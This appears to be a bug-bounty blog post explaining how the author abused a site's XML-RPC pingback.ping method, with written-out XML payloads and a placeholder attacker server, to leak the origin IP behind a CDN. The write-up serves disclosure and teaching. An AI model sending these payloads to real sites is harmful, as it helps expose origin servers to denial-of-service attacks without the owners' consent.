How i was able to abuse XML-RPC to get Origin IP.

Opara DavidOpara David
2 min read

What is XML-RPC

XML-RPC stands for "XML Remote Procedure Call". It’s a protocol that allows software running on different operating systems or written in different programming languages to make procedure calls over a network (usually HTTP).

How it works:

  • Remote Procedure Call (RPC): One program sends a request to another program to execute a function/procedure.

  • XML: The request and response are encoded in XML format.

  • Transport: The communication happens over HTTP.

A typical XML-RPC request might look like this:

<?xml version="1.0"?>
<methodCall>
  <methodName>math.add</methodName>
  <params>
    <param><value><int>5</int></value></param>
    <param><value><int>3</int></value></param>
  </params>
</methodCall>

How I found this vulnerability

I was basically performing a recon on my target. I visited the waybackmachine to fetch more urls which might contain pretty good information to ignite a spark. In the course of that, i stumbled upon on url

http://redacted.com:80/xmlrpc.php?rsd

Immediately, i remembered the XML-RPC vulnerability write-up i read over the internet some days back and how to exploit it to gain the Origin IP which may attackers can use to DDOS the entire application.

When i visited the Url, it gave this message saying “XML -RPC server accepts POST request only”. I captured the request on burpsuite and changed the Request method type to a POST request and added the XML below to the request body to list all the available methods.

<?xml version="1.0" encoding="utf-8"?>
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCal>

The response displayed all the available system call methods providing you with a list of functions that can potentially be exploited for an attack. In the response displayed was a method called pingback.ping. With this method call, you can test for pingbacks.

So the exploit is simple, parse the URL of your controlled server and a valid endpoint in the vulnerable server, then at your server, just log the incoming request. To make the whole process easier, you can use Burp Collaborator to achieve this. 

<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param>
<value><string>https://<YOUR SERVER></string></value>
</param>
<param>
<value><string>https://<SOME VALID BLOG FROM THE SITE>/</string></value>
</param>
</params>
</methodCall>

Being able to access the Origin of a web server is a bug and should be reported. Hackers can perform DOS attack directly to the web server. Read out blogs concerning Origin IP disclosure.

0
Subscribe to my newsletter

Read articles from Opara David directly inside your inbox. Subscribe to the newsletter, and don't miss out.

#cybersecurityCybersecurityAwarenessethicalhackingsoftware developmentSoftware Engineeringbugbounty

Written by

Opara David
Opara David